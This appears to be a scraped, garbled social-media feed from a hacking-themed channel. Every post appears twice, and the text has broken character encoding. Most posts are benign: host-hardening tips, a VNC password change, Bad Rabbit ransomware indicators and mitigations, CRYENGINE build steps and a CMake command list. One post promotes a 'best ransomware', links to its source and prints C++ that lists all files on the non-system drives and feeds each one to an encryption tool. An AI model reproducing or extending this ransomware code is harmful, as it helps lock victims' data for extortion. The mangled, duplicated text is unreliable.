5) Disable services and accounts which are not being used, or are no longer necessary
6) Replace insecure services (such as telnet, rsh, or rlogin) with more secure alternatives such as ssh
7) Restrict access to services which cannot be disabled where possible
8) Make and test backups of the system in a consistent manner
๐ฆBefore Installing The Operating System:
Before you begin any installation, be sure you have the following available:
1) Any operating system CDs or install media that you'll need, including license keys
2) A firewall to protect the host while you install everything (if the host will be connected to a network during the install) or all current patches and updates for the operating system on a CD (for a system which will not be connected to the network during installation)
3) A list of services the machine will provide, or a list of services which should be disabled after the machine is installed
4) A firewall is necessary to protect the host while you install the operating system and all necessary patches if you plan to have the host connected to a network during installation. Most operating systems are vulnerable to compromise when they are installed, and require many patches and updates before they can safely be allowed on the network
E N J O Y
Written by UndercOde
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow Secure My Host ?
Twitter.com/UndercOdeTc
1) Install and configure a host based firewall
2) Choose good passwords for any accounts on the system, and change any default or well known accounts on the machine
3) Install and keep up with operating system patches and also hardware firmware patches
4) Configure and continue to monitor logs on the device
5) Disable services and accounts which are not being used, or are no longer necessary
6) Replace insecure services (such as telnet, rsh, or rlogin) with more secure alternatives such as ssh
7) Restrict access to services which cannot be disabled where possible
8) Make and test backups of the system in a consistent manner
๐ฆBefore Installing The Operating System:
Before you begin any installation, be sure you have the following available:
1) Any operating system CDs or install media that you'll need, including license keys
2) A firewall to protect the host while you install everything (if the host will be connected to a network during the install) or all current patches and updates for the operating system on a CD (for a system which will not be connected to the network during installation)
3) A list of services the machine will provide, or a list of services which should be disabled after the machine is installed
4) A firewall is necessary to protect the host while you install the operating system and all necessary patches if you plan to have the host connected to a network during installation. Most operating systems are vulnerable to compromise when they are installed, and require many patches and updates before they can safely be allowed on the network
E N J O Y
Written by UndercOde
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ How to change VNC password on Linux
t.me/UndercOdeTestingOfficial
๐ฆโโโฃโข โโฃโโกโฃ
1) root required for some android versions
2) go to
> ~/.vnc/passwdis the default location where the VNC password is stored.
3) The password is stored at this location when the vncserver starts for a first time. To update or change your VNC password you should use vncpasswd command. vncpasswd will promt you two times to enter your new password:
4) The vncpasswd command also accepts a password input from STDIN which also allows to store password file into different location.
> example change the VNC password to MYVNCPASSWORD and store it to ~/.secret/vncpass given that the .secret directory exists:
$ echo MYVNCPASSWORD | vncpasswd -f > ~/.secret/passvnc
@UndercOdeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ How to change VNC password on Linux
t.me/UndercOdeTestingOfficial
๐ฆโโโฃโข โโฃโโกโฃ
1) root required for some android versions
2) go to
> ~/.vnc/passwdis the default location where the VNC password is stored.
3) The password is stored at this location when the vncserver starts for a first time. To update or change your VNC password you should use vncpasswd command. vncpasswd will promt you two times to enter your new password:
4) The vncpasswd command also accepts a password input from STDIN which also allows to store password file into different location.
> example change the VNC password to MYVNCPASSWORD and store it to ~/.secret/vncpass given that the .secret directory exists:
$ echo MYVNCPASSWORD | vncpasswd -f > ~/.secret/passvnc
@UndercOdeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆBest ransoware type 1:
Blackcat Crypto is open source Crypto-Locker. Blackcat Crypto is developed in Visual C++. It has features encrypt all file, lock down the system and send keys back to the server. Multi-threaded functionality helps to this tool make encryption faster
t.me/UndercOdeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) get the code :
>https://github.com/ajayrandhawa/Cryptolocker
2) (Fetch files)
Getting all files from all drive to encrypting them.
Here is Visual C++ program get all list directory & files in drive and store path in text file for encryption later use. I use Boost C++ libraries to get all files list. Please first setup Boost libraries to compile program.
#include <boost/config/warning_disable.hpp>
#include <boost/filesystem.hpp>
#include <iostream>
#include <iterator>
#include <stdio.h>
#include <windows.h>
using namespace std;
fstream out_file("data.txt", ios::out);
#define MAX 256
int main(int argc, char* argv[]) {
int dr_type = 99;
char dr_avail[MAX];
char *temp = dr_avail;
/* 1st we fill the buffer */
GetLogicalDriveStrings(MAX, dr_avail);
while (*temp != NULL) { // Split the buffer by null
dr_type = GetDriveType(temp);
char skip[10] = "C:\\";
if (dr_type == 3 && temp[0] != 'C') {
boost::system::error_code dir_error;
for (boost::filesystem::recursive_directory_iterator end, dir(temp, dir_error); dir != end; dir.increment(dir_error)) {
if (dir_error.value()) {
cerr << "Error accessing file: " << dir_error.message() << endl;
}
else {
cout << dir->path() << endl;
out_file << dir->path() << "\n";
}
}
}
temp += lstrlen(temp) + 1;
}
out_file.close();
system("pause");
3) (Encrypt files)
Here firstly I get every file path from "data.txt" line by line and send to this crypy tool with type encryption and password. you can also embed all this program in upper loop for getting path and encrypting data recursively.
out_file.open("data.txt", ios::in);
string line;
while (out_file.good()) {
getline(out_file, line);
cout << line << endl;
std::string cmmd = "crpt.exe -e -p 4321 ";
cmmd += line;
system(cmmd.c_str());
}
4) Create Long String Complex Password Function
Send length to function and function return complex long generated password which you can use for encryption.
string RandomString(int len)
{
srand(time(0));
string str = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
string newstr;
int pos;
while (newstr.size() != len) {
pos = ((rand() % (str.size() - 1)));
newstr += str.substr(pos, 1);
}
return newstr;
}
E N J O Y
by Undercode
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆBest ransoware type 1:
Blackcat Crypto is open source Crypto-Locker. Blackcat Crypto is developed in Visual C++. It has features encrypt all file, lock down the system and send keys back to the server. Multi-threaded functionality helps to this tool make encryption faster
t.me/UndercOdeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) get the code :
>https://github.com/ajayrandhawa/Cryptolocker
2) (Fetch files)
Getting all files from all drive to encrypting them.
Here is Visual C++ program get all list directory & files in drive and store path in text file for encryption later use. I use Boost C++ libraries to get all files list. Please first setup Boost libraries to compile program.
#include <boost/config/warning_disable.hpp>
#include <boost/filesystem.hpp>
#include <iostream>
#include <iterator>
#include <stdio.h>
#include <windows.h>
using namespace std;
fstream out_file("data.txt", ios::out);
#define MAX 256
int main(int argc, char* argv[]) {
int dr_type = 99;
char dr_avail[MAX];
char *temp = dr_avail;
/* 1st we fill the buffer */
GetLogicalDriveStrings(MAX, dr_avail);
while (*temp != NULL) { // Split the buffer by null
dr_type = GetDriveType(temp);
char skip[10] = "C:\\";
if (dr_type == 3 && temp[0] != 'C') {
boost::system::error_code dir_error;
for (boost::filesystem::recursive_directory_iterator end, dir(temp, dir_error); dir != end; dir.increment(dir_error)) {
if (dir_error.value()) {
cerr << "Error accessing file: " << dir_error.message() << endl;
}
else {
cout << dir->path() << endl;
out_file << dir->path() << "\n";
}
}
}
temp += lstrlen(temp) + 1;
}
out_file.close();
system("pause");
3) (Encrypt files)
Here firstly I get every file path from "data.txt" line by line and send to this crypy tool with type encryption and password. you can also embed all this program in upper loop for getting path and encrypting data recursively.
out_file.open("data.txt", ios::in);
string line;
while (out_file.good()) {
getline(out_file, line);
cout << line << endl;
std::string cmmd = "crpt.exe -e -p 4321 ";
cmmd += line;
system(cmmd.c_str());
}
4) Create Long String Complex Password Function
Send length to function and function return complex long generated password which you can use for encryption.
string RandomString(int len)
{
srand(time(0));
string str = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
string newstr;
int pos;
while (newstr.size() != len) {
pos = ((rand() % (str.size() - 1)));
newstr += str.substr(pos, 1);
}
return newstr;
}
E N J O Y
by Undercode
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆVIRUS IN bad Rabbit ransoware what can do ?
Twitter.com/UNDERCODETC
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
1) Trojan-Ransom.Win32.Gen.ftl
2) Trojan-Ransom.Win32.BadRabbit
3) DangerousObject.Multi.Generic
4) PDM:Trojan.Win32.Generic
5) Intrusion.Win.CVE-2017-0147.sa.leak
๐ฆTo avoid becoming a victim of Bad Rabbit:
1) Make sure you have System Watcher and Anti-virus Security Network running. If not, itโs essential to turn these features on.
2) Block the execution of files c:windowsinfpub.dat and c:Windowscscc.dat.
3) Disable WMI service (if itโs possible in your environment) to prevent the malware from spreading over your network.
๐ฆTips for everyone:
1) Back up your data.
2) Donโt pay the ransom.
Written by Steaven
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆVIRUS IN bad Rabbit ransoware what can do ?
Twitter.com/UNDERCODETC
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
1) Trojan-Ransom.Win32.Gen.ftl
2) Trojan-Ransom.Win32.BadRabbit
3) DangerousObject.Multi.Generic
4) PDM:Trojan.Win32.Generic
5) Intrusion.Win.CVE-2017-0147.sa.leak
๐ฆTo avoid becoming a victim of Bad Rabbit:
1) Make sure you have System Watcher and Anti-virus Security Network running. If not, itโs essential to turn these features on.
2) Block the execution of files c:windowsinfpub.dat and c:Windowscscc.dat.
3) Disable WMI service (if itโs possible in your environment) to prevent the malware from spreading over your network.
๐ฆTips for everyone:
1) Back up your data.
2) Donโt pay the ransom.
Written by Steaven
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ2019 CRYENGINE is a powerful real-time game development platform
facebook.com/UndercOdeTestingCompany
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
1) Download the SDKs zip from the releases page.
> https://github.com/CRYTEK/CRYENGINE/releases
) Extract the SDKs zip to Code/SDKs
3) Copy C:\Program Files\Autodesk\FBX\FBX SDK\2016.1 to Code/SDKs and rename to FbxSdk.
4) Download szip.tar.gz and extract it's contents to Code/SDKs/szip.
If the CRYENGINE Launcher is installed,
5) right click cryengine.cryengine and select "Generate Engine Solution". Otherwise, run Tools/CMake/cmake_create_win64_solution.bat.
THATS ALL !
Written by Steaven
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ2019 CRYENGINE is a powerful real-time game development platform
facebook.com/UndercOdeTestingCompany
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
1) Download the SDKs zip from the releases page.
> https://github.com/CRYTEK/CRYENGINE/releases
) Extract the SDKs zip to Code/SDKs
3) Copy C:\Program Files\Autodesk\FBX\FBX SDK\2016.1 to Code/SDKs and rename to FbxSdk.
4) Download szip.tar.gz and extract it's contents to Code/SDKs/szip.
If the CRYENGINE Launcher is installed,
5) right click cryengine.cryengine and select "Generate Engine Solution". Otherwise, run Tools/CMake/cmake_create_win64_solution.bat.
THATS ALL !
Written by Steaven
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Facebook
UndercOde Testing Company
UndercOde Testing Company. 96 likes ยท 7 talking about this. Local service
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆCMAKE C OMMANDS 2019-2020
Instagram.com/UndercOdeTestingcompany
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
These commands are available only in CMake projects.
add_compile_definitions
add_compile_options
add_custom_command
add_custom_target
add_definitions
add_dependencies
add_executable
add_library
add_link_options
add_subdirectory
add_test
aux_source_directory
build_command
create_test_sourcelist
define_property
enable_language
enable_testing
export
fltk_wrap_ui
get_source_file_property
get_target_property
get_test_property
include_directories
include_external_msproject
include_regular_expression
install
link_directories
link_libraries
load_cache
project
remove_definitions
set_source_files_properties
set_target_properties
set_tests_properties
source_group
target_compile_definitions
target_compile_features
target_compile_options
target_include_directories
target_link_directories
target_link_libraries
target_link_options
target_precompile_headers
target_sources
try_compile
try_run
๐ฆThese commands are available only in CTest scripts.
ctest_build
ctest_configure
ctest_coverage
ctest_empty_binary_directory
ctest_memcheck
ctest_read_custom_files
ctest_run_script
ctest_sleep
ctest_start
ctest_submit
ctest_test
ctest_update
ctest_upload
๐ฆThese commands are deprecated and are only made available to maintain backward compatibility. The documentation of each command states the CMake version in which it was deprecated. Do not use these commands in new code.
build_name
exec_program
export_library_dependencies
install_files
install_programs
install_targets
load_command
make_directory
output_required_files
qt_wrap_cpp
qt_wrap_ui
remove
subdir_depends
subdirs
use_mangled_mesa
utility_source
variable_requires
write_file
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆCMAKE C OMMANDS 2019-2020
Instagram.com/UndercOdeTestingcompany
๐ฆ๐ ป๐ ด๐ ๐ ๐๐๐ ฐ๏ธ๐๐:
These commands are available only in CMake projects.
add_compile_definitions
add_compile_options
add_custom_command
add_custom_target
add_definitions
add_dependencies
add_executable
add_library
add_link_options
add_subdirectory
add_test
aux_source_directory
build_command
create_test_sourcelist
define_property
enable_language
enable_testing
export
fltk_wrap_ui
get_source_file_property
get_target_property
get_test_property
include_directories
include_external_msproject
include_regular_expression
install
link_directories
link_libraries
load_cache
project
remove_definitions
set_source_files_properties
set_target_properties
set_tests_properties
source_group
target_compile_definitions
target_compile_features
target_compile_options
target_include_directories
target_link_directories
target_link_libraries
target_link_options
target_precompile_headers
target_sources
try_compile
try_run
๐ฆThese commands are available only in CTest scripts.
ctest_build
ctest_configure
ctest_coverage
ctest_empty_binary_directory
ctest_memcheck
ctest_read_custom_files
ctest_run_script
ctest_sleep
ctest_start
ctest_submit
ctest_test
ctest_update
ctest_upload
๐ฆThese commands are deprecated and are only made available to maintain backward compatibility. The documentation of each command states the CMake version in which it was deprecated. Do not use these commands in new code.
build_name
exec_program
export_library_dependencies
install_files
install_programs
install_targets
load_command
make_directory
output_required_files
qt_wrap_cpp
qt_wrap_ui
remove
subdir_depends
subdirs
use_mangled_mesa
utility_source
variable_requires
write_file
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ